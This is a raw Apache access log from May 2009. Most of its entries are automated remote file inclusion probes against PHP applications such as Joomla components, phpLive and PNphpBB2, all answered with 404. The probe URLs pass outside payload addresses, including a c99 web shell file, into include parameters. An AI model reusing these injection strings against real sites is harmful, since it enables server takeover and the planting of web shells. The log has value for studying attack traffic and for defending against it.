85.17.162.28 - - [30/May/2009:02:50:29 -0400] "GET /logs/access_log.Q109051500%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:50:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.203 - - [30/May/2009:02:50:39 -0400] "GET /logs/access_log.Q107113000/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
125.206.170.126 - - [30/May/2009:02:51:37 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.0" 404 242 "-" "libwww-perl/5.50"
125.206.170.126 - - [30/May/2009:02:51:37 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.0" 404 215 "-" "libwww-perl/5.50"
125.206.170.126 - - [30/May/2009:02:51:38 -0400] "GET /logs//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.0" 404 220 "-" "libwww-perl/5.50"
201.134.110.45 - - [30/May/2009:02:51:42 -0400] "GET /logs/error_log.Q108051600%20/rgboard//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
201.134.110.45 - - [30/May/2009:02:51:42 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
201.134.110.45 - - [30/May/2009:02:51:42 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
118.45.190.166 - - [30/May/2009:02:51:52 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.27.203.107 - - [30/May/2009:02:52:06 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
78.105.4.228 - - [30/May/2009:02:52:18 -0400] "GET /administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
78.105.4.228 - - [30/May/2009:02:52:18 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
78.105.4.228 - - [30/May/2009:02:52:21 -0400] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:52:50 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:52:50 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:52:50 -0400] "GET //skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:52:50 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.134.110.45 - - [30/May/2009:02:52:54 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:02:52:54 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.236.47.188 - - [30/May/2009:02:52:56 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
122.153.212.195 - - [30/May/2009:02:53:04 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:53:04 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:53:04 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:53:08 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:53:54 -0400] "GET /logs/access_log.Q109051500//com_joomlaflashfun/admin.joomlaflashfun.php?=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.206.170.126 - - [30/May/2009:02:54:26 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.0" 404 215 "-" "libwww-perl/5.50"
203.251.225.77 - - [30/May/2009:02:54:40 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:02:54:40 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
85.18.117.101 - - [30/May/2009:02:54:45 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:54:48 -0400] "GET //skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:54:48 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:55:03 -0400] "GET //skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:55:03 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:55:03 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:55:16 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:55:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.117.101 - - [30/May/2009:02:55:31 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:02:55:38 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:02:55:38 -0400] "GET /logs/access_log.Q109051600%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:02:55:38 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:02:56:05 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:56:15 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:56:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:56:15 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:57:59 -0400] "GET /logs/access_log.Q109050300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:58:18 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:58:18 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:58:18 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:58:26 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.55.105.236 - - [30/May/2009:02:58:45 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.236 - - [30/May/2009:02:58:46 -0400] "GET /scripts/browser_opera7.js HTTP/1.1" 200 8675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.1.205.86 - - [30/May/2009:02:59:23 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
62.1.205.86 - - [30/May/2009:02:59:24 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
62.1.205.86 - - [30/May/2009:02:59:24 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
194.126.110.134 - - [30/May/2009:02:59:27 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.38.31.27 - - [30/May/2009:02:59:52 -0400] "GET /logs/access_log.Q109050300//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
70.38.31.27 - - [30/May/2009:02:59:52 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
70.38.31.27 - - [30/May/2009:02:59:53 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
70.38.31.27 - - [30/May/2009:03:00:04 -0400] "GET /logs/access_log.Q108081500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:03:00:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.80.198.13 - - [30/May/2009:03:00:43 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:03:00:58 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:01:39 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:01:43 -0400] "GET /logs/error_log.Q108110600//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:01:43 -0400] "GET //index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:01:43 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:01:43 -0400] "GET /logs/error_log.Q108071900//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
77.79.246.241 - - [30/May/2009:03:02:01 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:02:01 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:02:01 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.181.7.97 - - [30/May/2009:03:02:28 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.203.180.144 - - [30/May/2009:03:02:31 -0400] "GET /logs/error_log.Q108110600//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:02:31 -0400] "GET //index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:02:31 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
123.143.98.5 - - [30/May/2009:03:02:34 -0400] "GET //index.php?DOCUMENT_ROOT=http://alibi-pcportable.fr//administrator/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:02:34 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alibi-pcportable.fr//administrator/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:02:34 -0400] "GET //index.php?DOCUMENT_ROOT=http://alibi-pcportable.fr//administrator/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:03:02:34 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alibi-pcportable.fr//administrator/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:02:41 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:02:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:02:41 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:02:41 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
123.125.64.38 - - [30/May/2009:03:03:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.165.73.157 - - [30/May/2009:03:03:10 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:03:21 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:03:23 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:03:42 -0400] "GET /logs/access_log.Q109050300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:04:00 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:04:00 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:04:00 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:04:14 -0400] "GET /logs/access_log.Q109050300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:04:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [30/May/2009:03:04:58 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [30/May/2009:03:04:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
117.18.244.2 - - [30/May/2009:03:04:59 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; yie8)"
117.18.244.2 - - [30/May/2009:03:04:59 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; yie8)"
117.18.244.2 - - [30/May/2009:03:05:01 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; yie8)"
117.18.244.2 - - [30/May/2009:03:05:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; yie8)"
91.149.157.130 - - [30/May/2009:03:05:15 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
209.59.12.99 - - [30/May/2009:03:05:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [30/May/2009:03:06:08 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.150.52.114 - - [30/May/2009:03:06:08 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.150.52.114 - - [30/May/2009:03:06:08 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.150.52.114 - - [30/May/2009:03:07:17 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:07:42 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.149.157.130 - - [30/May/2009:03:07:42 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.149.157.130 - - [30/May/2009:03:07:42 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.149.157.130 - - [30/May/2009:03:08:01 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
61.81.93.142 - - [30/May/2009:03:08:42 -0400] "GET //skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:08:45 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:08:45 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
